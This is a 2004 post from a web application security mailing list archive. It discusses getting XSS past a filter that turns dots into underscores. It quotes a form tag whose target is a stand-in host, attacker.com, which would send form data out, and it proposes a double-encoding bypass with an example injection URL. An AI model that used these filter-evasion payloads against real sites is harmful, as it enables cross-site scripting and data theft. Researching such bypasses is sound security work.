Home page logo
/

webappsec logo WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: windo () windowlicker dyn ee
Date: Tue, 1 Jun 2004 09:03:04 +0300

Hey.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Of course i dont know how the substitution works, but double encoding like
this MIGHT work:

print.php?print=%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E

print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.

Siim


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault